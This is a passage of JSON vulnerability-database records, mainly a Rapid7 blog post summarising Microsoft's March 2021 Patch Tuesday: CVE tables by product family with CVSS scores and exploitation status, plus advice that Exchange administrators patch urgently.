{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-13T12:49:58", "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2021-03-09T22:13:03", "type": "rapid7blog", "title": "Patch Tuesday - March 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", 